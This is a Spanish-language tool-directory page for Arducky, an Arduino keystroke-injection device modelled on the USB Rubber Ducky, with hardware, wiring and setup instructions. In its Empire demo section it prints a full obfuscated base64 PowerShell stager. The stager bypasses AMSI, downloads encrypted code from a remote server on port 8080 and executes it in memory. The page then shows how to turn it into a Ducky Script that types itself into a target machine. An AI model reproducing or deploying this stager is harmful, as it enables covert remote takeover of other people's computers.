Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
arducky — Arducky - Intérprete de Ducky Script para Arduino | Kitploit
Herramientas/GitLabGitLab/creased/arducky
Generación de PayloadsPost-ExplotaciónHacking de HardwarePruebas de PenetraciónRed Teaming
GitLabcreased/arducky

arducky

Arducky - Intérprete de Ducky Script para Arduino

Ver Repositorio
12hace 8 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

Arducky - Intérprete de Ducky Script para Arduino

Este proyecto tiene como objetivo crear una alternativa económica (pero no menos eficiente) al USB Rubber Ducky de Hak5.

Introducción

El USB Rubber Ducky es un HID (Human Interface Device) programable con un lenguaje de scripting simple que permite a los probadores de penetración crear e implementar rápidamente y fácilmente payloads de auditoría de seguridad que imitan la entrada del teclado humano.

Usando Arducky, solo necesitas lidiar con Ducky Script almacenado en una tarjeta MicroSD.

Después de la configuración, ya no necesitarás reprogramar tu Arduino para cambiar scripts.

Hardwares

CantidadElementoPrecioDescripción
1Placa Arduino Pro Micro ATmega32U4 5V$4.11Compatible con protocolo USB, puede usarse como ratón o teclado HID
1Shield Micro SD Memory$0.78
1Adaptador Micro USB OTG$0.99Facultativo. Puede usarse para reemplazar el cable micro USB
1Cables DuPont$1.28
1Tarjeta Micro SD$18.00Esto es un ejemplo, dudo que necesites más de 1GB

Formateo

Para usar tu tarjeta Micro SD con Arducky, la tarjeta debe estar formateada en sistema de archivos FAT32.

Recomiendo encarecidamente formatear tu tarjeta SD (¡incluso si es nueva!), usando el formateador oficial de tarjetas SD de la SDA (SD Association) SD Memory Card Formatter en lugar de las herramientas de formateo proporcionadas por tu sistema operativo.

Cableado

¡Ahora que has formateado tu tarjeta MicroSD, cableemos el shield MicroSD!

La interfaz del controlador MicroSD tiene un total de seis pines (GND, VCC, MISO, MOSI, SCK, CS).

Basado en la documentación SPI de Arduino, la interfaz de control debe conectarse de la siguiente manera (usando cables DuPont):

arducky_pinout

Nota: Como se mencionó en la sección Hardwares, el módulo está diseñado para interactuar con un µC de 5V, por lo que necesitarás el pin de 5V en tu Arduino.

arducky_right

arduino_pro_micro

Configuración

Clona el proyecto:

root@kitploit:~
git clone https://gitlab.com/Creased/arducky
cd arducky/

Si estás usando un teclado AZERTY, también necesitarás reemplazar tu librería Keyboard (Keyboard.cpp y Keyboard.h) con la incluida.

Sube el sketch arducky.ino a tu placa Arduino usando el IDE de Arduino.

Femtoduino

Para generar el archivo arducky_femto.ino con un payload de Ducky Script, puedes usar femto_generate_payload.py:

root@kitploit:~
~# python3 femto_generate_payload.py -h
usage: femto_generate_payload.py [-h] [-i ino_file] [-o output_file]
                                          payload_file

Generates payload in arducky_femto.ino from an input Rubber Ducky payload file

positional arguments:
  payload_file          input Rubber Ducky payload file

optional arguments:
  -h, --help            show this help message and exit
  -i ino_file, --ino ino_file
                        input Arducky ino file
  -o output_file, --out output_file
                        output Arducky ino file

Ejemplo:

root@kitploit:~
~# python3 femto_generate_payload.py -i arducky_femto.ino -o femto.ino demo/script.txt

El Imperio contraataca con Arducky (demo)

Empire es un framework de post-explotación que implementa la capacidad de ejecutar agentes de PowerShell sin necesidad de powershell.exe, módulos de post-explotación de rápido despliegue que van desde keyloggers hasta Mimikatz.

En esta demo, desplegaremos un Empire en un servidor remoto (como un VPS) en un nodo Docker y usaremos Arducky para unirnos a él.

Configuración

Por favor, sigue los pasos descritos en esta guía.

Ducky Script

Al configurar un nuevo Empire, deberías obtener un payload como el siguiente (ver carpeta demo/):

root@kitploit:~
powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQBzAFMARQBNAEIAbAB5AC4ARwBlAHQAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAVABGAEkAZQBsAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAFUAZQAoACQAbgBVAEwAbAAsACQAVAByAHUAZQApAH0AOwBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBTAEUAcgB2AGkAYwBlAFAATwBJAG4AdABNAGEAbgBBAGcARQBSAF0AOgA6AEUAWABwAEUAYwBUADEAMAAwAEMAbwBOAHQAaQBOAFUARQA9ADAAOwAkAHcAYwA9AE4ARQB3AC0ATwBCAEoAZQBDAFQAIABTAFkAUwB0AEUATQAuAE4ARQB0AC4AVwBFAEIAQwBsAGkAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABXAGMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAHIATwBYAFkAPQBbAFMAeQBTAHQARQBNAC4ATgBFAHQALgBXAGUAQgBSAGUAcQB1AEUAUwBUAF0AOgA6AEQAZQBGAEEAVQBMAHQAVwBlAEIAUABSAG8AWABZADsAJAB3AEMALgBQAHIAbwBYAHkALgBDAHIAZQBEAEUAbgBUAEkAYQBMAFMAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAE4ARQBUAC4AQwByAEUARABFAE4AVABJAEEAbABDAGEAYwBIAEUAXQA6ADoARABFAGYAYQBVAEwAVABOAEUAVAB3AG8AcgBLAEMAcgBlAGQARQBuAHQASQBBAGwAcwA7ACQASwA9AFsAUwBZAHMAdABlAE0ALgBUAEUAWABUAC4ARQBOAEMATwBEAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACcASwBBAE4AcwAjADgAJQBtAHAAWgBpAGQAUABTAEwAaABhAF0AZwBWAFsAWQAuAEcAPwBuAGsAfQBGAGMALwAzACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIARwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAHUATgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAVwBDAC4ASABFAGEARABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AMgBtADAARQB6AEsALwBlAEEATQBTAE4AbQAxAEIAaABlAEYAUwBEAGYAZAB3AE0AaQBxAFEAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvAHYAcABzADIALgBiAG0AbwBpAG4AZQAuAGYAcgA6ADgAMAA4ADAAJwA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkAGQAQQB0AGEAPQAkAFcAQwAuAEQATwBXAE4AbABvAEEAZABEAGEAdABhACgAJABzAGUAUgArACQAVAApADsAJABJAFYAPQAkAEQAYQB0AEEAWwAwAC4ALgAzAF0AOwAkAGQAYQBUAEEAPQAkAEQAQQB0AEEAWwA0AC4ALgAkAEQAQQB0AGEALgBMAEUATgBnAHQAaABdADsALQBKAG8ASQBOAFsAQwBIAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

Guárdalo en un archivo llamado stager.txt y ejecuta el script create_script.sh para crear el Ducky Script:

root@kitploit:~
./create_script.sh

Copia el script.txt generado a la raíz del sistema de archivos de tu tarjeta MicroSD y enciende el Arducky.

Aquí hay un video que demuestra el ataque:

Video demo.

¡Voilà!

arducky_bottom arducky_front arducky_left arducky_top arducky_workbench

Descargar herramienta